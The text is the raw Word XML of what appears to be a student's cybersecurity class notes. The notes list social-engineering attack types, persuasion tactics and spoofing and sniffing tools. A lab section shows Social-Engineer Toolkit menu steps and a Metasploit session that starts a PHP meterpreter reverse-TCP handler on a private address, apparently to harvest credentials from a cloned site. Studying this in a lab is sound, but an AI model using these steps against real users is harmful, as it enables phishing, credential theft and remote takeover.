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31F8" w14:textId="62C70B79" w:rsidR="00AF5BFA" w:rsidRPr="008E621F" w:rsidRDefault="00AF5BFA" w:rsidP="008E621F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8E621F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Class</w:t>
      </w:r>
      <w:r w:rsidR="008E621F" w:rsidRPr="008E621F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="008E621F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> 08</w:t>
      </w:r>
      <w:r w:rsidR="00FA37F9" w:rsidRPr="008E621F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="008E621F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>03 Oct 2024</w:t>
      </w:r>
      <w:r w:rsidR="008E621F" w:rsidRPr="008E621F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EBCB64" w14:textId="77777777" w:rsidR="00FE14E9" w:rsidRDefault="00FE14E9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61E67C10" w14:textId="77777777" w:rsidR="008E32AE" w:rsidRPr="006F4B94" w:rsidRDefault="008E32AE" w:rsidP="00FB2FA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F4B94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Popular Social Engineering Attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62326F9E" w14:textId="77777777" w:rsidR="008E32AE" w:rsidRDefault="00A308DB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E32AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Impersonation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F0D943" w14:textId="77777777" w:rsidR="00A308DB" w:rsidRDefault="00A308DB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Phishing </w:t>
      </w:r>
      <w:r w:rsidRPr="00A308D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very popular attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CBC984" w14:textId="77777777" w:rsidR="00527E4C" w:rsidRDefault="00527E4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Whaling and vishing </w:t>
      </w:r>
      <w:r w:rsidRPr="00527E4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send email a specific person(“the big fish”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FE8F30" w14:textId="77777777" w:rsidR="00527E4C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Smishing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C81427" w14:textId="729F9696" w:rsidR="001E712C" w:rsidRDefault="006F4B94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Spam</w:t>
      </w:r>
      <w:r w:rsidR="003B77D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B77D3" w:rsidRPr="003B77D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="003B77D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> spam over instant </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>messaging</w:t>
      </w:r>
      <w:r w:rsidR="003B77D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (spIM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BA15B4" w14:textId="77777777" w:rsidR="001E712C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Spear phishing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4D2632" w14:textId="26531A91" w:rsidR="005871C3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Eliciting information</w:t>
      </w:r>
      <w:r w:rsidR="00444EF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00444EF3" w:rsidRPr="00444EF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00444EF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> future </w:t>
      </w:r>
      <w:r w:rsidR="006F4B94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BF1F69" w14:textId="77777777" w:rsidR="005871C3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Prepending</w:t>
      </w:r>
      <w:r w:rsidR="00444EF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C33A3" w:rsidRPr="007C33A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="007C33A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>facebook.com@192.168.15.24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6624D16A" w14:textId="77777777" w:rsidR="005871C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Identity fraud</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D82BA48" w14:textId="77777777"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Invoice scams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B312FC8" w14:textId="3C31C873"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Credential </w:t>
      </w:r>
      <w:r w:rsidR="006F4B94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>harvesting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7902B40A" w14:textId="77777777"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Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C1E029" w14:textId="77777777"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Influence campaigns/hybrid warfare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C180E6" w14:textId="77777777" w:rsidR="007C33A3" w:rsidRDefault="007C33A3" w:rsidP="00FB2FA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="117AE913" w14:textId="77777777"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Shoulder Surfing and Dumpster Diving</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334C387F" w14:textId="77777777"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Tailgating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E203BA1" w14:textId="77777777"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Hoaxes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059C3AA7" w14:textId="77777777" w:rsidR="00FB2FA5" w:rsidRPr="006F4B94" w:rsidRDefault="00FB2FA5" w:rsidP="00FB2FA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F4B94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Physical Attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5582BDC2" w14:textId="446D62C9"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Malicious Universal Serial </w:t>
      </w:r>
      <w:r w:rsidR="006F4B94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bus (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>USB) cable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B691F2" w14:textId="77777777"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Malicious flash drive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E09BBEA" w14:textId="77777777"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 cloning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367AF964" w14:textId="77777777"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Skimming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BE550F" w14:textId="77777777"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Adversarial Artificial Intelligence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED1F138" w14:textId="77777777"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Supply-Chain Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071FEA35" w14:textId="77777777" w:rsidR="00FB2FA5" w:rsidRPr="006F4B94" w:rsidRDefault="00045CBD" w:rsidP="00FB2FA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F4B94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Reasons for Effectiveness of Social Engineering Attacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E68A647" w14:textId="77777777"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Authority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBFE662" w14:textId="77777777"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Intimidation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF6095B" w14:textId="77777777"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Consensus/Social proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD1B409" w14:textId="77777777"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Scarcity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F49E26" w14:textId="77777777"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Urgency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6412B1" w14:textId="77777777"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Familiarity/liking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2DBF95" w14:textId="77777777"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Trust</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421B8235" w14:textId="77777777" w:rsidR="00045CBD" w:rsidRDefault="00804F77" w:rsidP="00045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Spoofing</w:t>
      </w:r>
      <w:r w:rsidR="00307190">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: alter the source information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345F053E" w14:textId="77777777" w:rsidR="00130ACE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Nemesis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C58FB22" w14:textId="77777777" w:rsidR="00130ACE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Hping2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA71880" w14:textId="77777777" w:rsidR="00130ACE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Macchanger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7163B579" w14:textId="77777777" w:rsidR="00130ACE" w:rsidRDefault="009C6ADE" w:rsidP="00130A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 Packet sniffing software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1935CE08" w14:textId="77777777" w:rsidR="009C6ADE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Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402DD21D" w14:textId="77777777" w:rsidR="009C6ADE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Tcpdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E267C5" w14:textId="77777777" w:rsidR="009C6ADE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Airodump-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B3C41C" w14:textId="77777777" w:rsidR="003F7CCD" w:rsidRDefault="003F7CCD" w:rsidP="003F7CCD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B775450" w14:textId="77777777" w:rsidR="003F7CCD" w:rsidRPr="006F4B94" w:rsidRDefault="003F7CCD" w:rsidP="003F7CCD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F4B94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Pass the Hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEA81B7" w14:textId="77777777" w:rsidR="00FB2FA5" w:rsidRDefault="00FB2FA5" w:rsidP="00FB2FA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E7F1EAC" w14:textId="77777777" w:rsidR="00DF1CA7" w:rsidRDefault="00C41F26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 file store hash type password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC89A7A" w14:textId="77777777" w:rsidR="00666925" w:rsidRDefault="001458A1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13DB2D0A" w14:textId="77777777" w:rsidR="001458A1" w:rsidRDefault="001458A1" w:rsidP="00FB2FA5">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="thinThickThinMediumGap" w:sz="18" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A5B8FB4" w14:textId="77777777" w:rsidR="001458A1" w:rsidRPr="001458A1" w:rsidRDefault="001458A1" w:rsidP="001458A1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001458A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A4D9A4" w14:textId="77777777" w:rsidR="001458A1" w:rsidRDefault="001458A1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sudo su</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203E159D" w14:textId="77777777" w:rsidR="00E46746" w:rsidRDefault="00E46746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setoolkit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1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2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3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2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Enter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(go another terminal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CFE1E2" w14:textId="77777777" w:rsidR="00E46746" w:rsidRDefault="002C66A1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sudo su</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A195745" w14:textId="77777777" w:rsidR="002C66A1" w:rsidRDefault="002C66A1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msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2935C670" w14:textId="77777777" w:rsidR="002C66A1" w:rsidRDefault="002C66A1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exploit.multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0A7E66" w14:textId="77777777" w:rsidR="002C66A1" w:rsidRDefault="002C66A1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payload php/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209FBC04" w14:textId="77777777" w:rsidR="002C66A1" w:rsidRPr="002C66A1" w:rsidRDefault="003F3287" w:rsidP="002C66A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F3287">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt; </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="003F3287">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>https://iitju.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFC9855" w14:textId="77777777"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r w:rsidRPr="00662E73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>msf6 exploit(multi/handler) &gt; use LHOST 192.168.10.196</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376CB52B" w14:textId="77777777"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No results from search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606F069D" w14:textId="77777777"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Failed to load module: LHOST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5DA6A1" w14:textId="77777777"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r w:rsidRPr="00662E73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>msf6 exploit(multi/handler) &gt; use LHOST 192.168.10.196</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CE300E" w14:textId="77777777"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No results from search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46163A17" w14:textId="77777777"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Failed to load module: LHOST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBF5640" w14:textId="77777777"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r w:rsidRPr="00662E73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>msf6 exploit(multi/handler) &gt; set LHOST 192.168.10.196</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105CC38C" w14:textId="77777777"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LHOST =&gt; 192.168.10.196</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C693B8" w14:textId="77777777"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r w:rsidRPr="00662E73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>msf6 exploit(multi/handler) &gt; set LHOST 192.168.10.196</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1DED15" w14:textId="77777777"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LHOST =&gt; 192.168.10.196</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791D2667" w14:textId="77777777"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r w:rsidRPr="00662E73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>msf6 exploit(multi/handler) &gt; set LPORT 444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E572D35" w14:textId="77777777"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LPORT =&gt; 444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216E4AC2" w14:textId="77777777"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r w:rsidRPr="00662E73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>msf6 exploit(multi/handler) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F36BBBC" w14:textId="77777777" w:rsidR="002C66A1" w:rsidRPr="002C66A1" w:rsidRDefault="002C66A1" w:rsidP="002C66A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11CCEB2C" w14:textId="77777777"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 xml:space="preserve">[*] Started reverse TCP handler on 192.168.10.196:444 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D66C295" w14:textId="77777777"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 xml:space="preserve">^C[-] Exploit failed [user-interrupt]: Interrupt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A43D8E5" w14:textId="77777777"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exploit: Interrupted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B99A132" w14:textId="0F5D5E32" w:rsid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msf6 exploit(multi/handler) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6A941F" w14:textId="54003A80" w:rsidR="00662E73" w:rsidRDefault="00662E73" w:rsidP="002C66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id and pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC13F81" w14:textId="77777777" w:rsidR="002C66A1" w:rsidRPr="00FB2FA5" w:rsidRDefault="002C66A1" w:rsidP="00FB2FA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="002C66A1" w:rsidRPr="00FB2F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64DBB" w14:textId="77777777" w:rsidR="007D5BF5" w:rsidRDefault="007D5BF5" w:rsidP="00DE0D5A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="35E7B221" w14:textId="77777777" w:rsidR="007D5BF5" w:rsidRDefault="007D5BF5" w:rsidP="00DE0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2513F" w14:textId="77777777" w:rsidR="00DE0D5A" w:rsidRDefault="00DE0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875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4F0CF3" w14:textId="7C7798F7" w:rsidR="00DE0D5A" w:rsidRDefault="00DE0D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190B6" w14:textId="7245C9EE" w:rsidR="00DE0D5A" w:rsidRDefault="00DE0D5A">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r w:rsidRPr="00DE0D5A">
      <w:t>©</w:t>
    </w:r>
    <w:r>
      <w:t xml:space="preserve"> Shakiliitju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F096" w14:textId="77777777" w:rsidR="00DE0D5A" w:rsidRDefault="00DE0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A93A7" w14:textId="77777777" w:rsidR="007D5BF5" w:rsidRDefault="007D5BF5" w:rsidP="00DE0D5A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="63C8275C" w14:textId="77777777" w:rsidR="007D5BF5" w:rsidRDefault="007D5BF5" w:rsidP="00DE0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FA7EA" w14:textId="77777777" w:rsidR="00DE0D5A" w:rsidRDefault="00DE0D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373F" w14:textId="77777777" w:rsidR="00DE0D5A" w:rsidRDefault="00DE0D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C90E" w14:textId="77777777" w:rsidR="00DE0D5A" w:rsidRDefault="00DE0D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228"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="90AC7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63B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="57DC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2153"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3D08C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640A5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="99D27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474A2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="80FA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2735E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5B147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66C4E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="59A2E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EF8"/>
    <w:rsid w:val="00045CBD"/>
    <w:rsid w:val="00130ACE"/>
    <w:rsid w:val="001458A1"/>
    <w:rsid w:val="001E712C"/>
    <w:rsid w:val="00217BAE"/>
    <w:rsid w:val="002C66A1"/>
    <w:rsid w:val="00307190"/>
    <w:rsid w:val="003B77D3"/>
    <w:rsid w:val="003F3287"/>
    <w:rsid w:val="003F7CCD"/>
    <w:rsid w:val="00444EF3"/>
    <w:rsid w:val="00527E4C"/>
    <w:rsid w:val="005871C3"/>
    <w:rsid w:val="00662E73"/>
    <w:rsid w:val="00666925"/>
    <w:rsid w:val="006F4B94"/>
    <w:rsid w:val="007A1BBA"/>
    <w:rsid w:val="007C33A3"/>
    <w:rsid w:val="007D5BF5"/>
    <w:rsid w:val="00804F77"/>
    <w:rsid w:val="008E1DBF"/>
    <w:rsid w:val="008E32AE"/>
    <w:rsid w:val="008E621F"/>
    <w:rsid w:val="009C6ADE"/>
    <w:rsid w:val="00A308DB"/>
    <w:rsid w:val="00AF5BFA"/>
    <w:rsid w:val="00C41F26"/>
    <w:rsid w:val="00D15EF8"/>
    <w:rsid w:val="00DE0D5A"/>
    <w:rsid w:val="00DF1CA7"/>
    <w:rsid w:val="00E46746"/>
    <w:rsid w:val="00FA37F9"/>
    <w:rsid w:val="00FB2FA5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5AE5F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AF209659-20D8-49C2-82FC-F2BF5A4E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B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2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0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5A"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DE0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iitju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Md. Shakil Hossain</cp:lastModifiedBy>
  <cp:revision>34</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-03T11:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-03T13:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>